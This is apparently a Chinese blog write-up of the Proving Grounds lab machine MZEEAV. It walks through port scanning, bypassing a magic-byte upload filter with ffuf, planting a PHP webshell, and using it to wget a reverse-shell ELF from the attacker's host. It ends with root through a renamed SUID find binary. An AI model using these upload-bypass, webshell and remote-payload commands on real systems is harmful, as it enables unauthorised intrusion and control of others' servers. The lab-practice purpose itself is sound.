当前位置: 首页 > ops >正文

PG靶机复现 MZEEAV

端口扫描

nmap -sC -sV -Pn -n -T4 -p- 192.168.229.33

在这里插入图片描述

枚举

在这里插入图片描述
目录扫描
在这里插入图片描述

在这里插入图片描述
发现backup.zip文件
在这里插入图片描述
查看其中的upload.php代码发现是检查magicbytes

绕过bypass

下载magicbytes数据库,这个不错

https://github.com/FanaticPythoner/pyMagicBytes/blob/master/DB

提取:

cat ./DB | awk -F '|' '{print $3}' | sort -u > ./magic_bytes_hex.txt

然后使用burpsuite抓包
在这里插入图片描述
将请求保存到本地文件,方便使用
需要在请求中添加FUZZ,告诉ffuf工具进行利用
在这里插入图片描述

然后

ffuf -c --request-proto http -w <(while read h; do echo $(echo $h | xxd -r -p); done < ./magic_bytes_hex.txt) -request ./fufftest -fr 'Unsupported file type!'

在这里插入图片描述可以看见已经绕过
在这里插入图片描述
成功,拿到一个webshell
在这里插入图片描述
测试一下80端口是否可以出站,没问题
上传恶意elf文件
在这里插入图片描述

http://192.168.229.33/upload/mime_shell.php?cmd=wget%20http://192.168.45.227/reshell%20-O%20/tmp/reshell

在这里插入图片描述

http://192.168.229.33/upload/mime_shell.php?cmd=chmod%20777%20/tmp/reshell

在这里插入图片描述
成功拿到shell

提取

先拿到一个TTY shell

python3 -c 'import pty;pty.spawn("/bin/bash");'
export TERM=xterm-256color
Ctrl + z
stty raw -echo;fg
reset

在这里插入图片描述
拿到local.txt,
然后我喜欢上传linpeas.sh和pspy64进行枚举

发现一个未知的suid二进制文件
在这里插入图片描述
在这里插入图片描述
检查用法,发现就是find,名字改了
在这里插入图片描述
在这里插入图片描述
利用
在这里插入图片描述
成功

http://www.xdnf.cn/news/14158.html

相关文章:

  • JavaScript基础-事件对象
  • Oracle索引
  • Vue 事件修饰符详解
  • Linux集市采购指南[特殊字符]:yum和apt的“抢货”大战!
  • 数据结构 学习 队列 2025年6月14日 11点22分
  • 吴恩达机器学习笔记(2)—单变量线性回归
  • 检测 AI 生成的真实世界模拟视频
  • AI绘画能发展到企业大规模使用的地步么?
  • SD和comfyui常用模型介绍和下载
  • NLP学习路线图(四十六):可解释性
  • 制品构建与管理 - Docker 镜像的最佳实践
  • 【Ubuntu 22.04 推荐的 apt 包管理方式详解】
  • 人工智能学习17-Pandas-查看数据
  • MySQL从库复制延迟的监测
  • conda虚拟环境管理
  • 数据治理域——数据建模设计
  • 使用NVIDIA NeMo Agent Toolkit扩展现实机器人仿真的物理AI应用
  • 逆向入门(5)程序逆向篇-AD_CM#2
  • 开疆智能ModbusTCP转Devicenet网关连接FANUC机器人配置案例
  • [C++] STL大家族之<map>(字典)容器(附洛谷)
  • 《Kafka 在实时消息系统中的高可用架构设计》
  • Python应用八股文
  • shell编程语言-1 shell脚本基础
  • java类的封装和方法重载和递归
  • TensorFlow Serving学习笔记2: 模型服务
  • Mysql数据库安装图解
  • EngineAI 1. Start/Resume Training
  • pyhton基础【7】容器介绍二
  • iOS 审核 cocos 4.3a【苹果机审的“分层阈值”设计】
  • 详解智能指针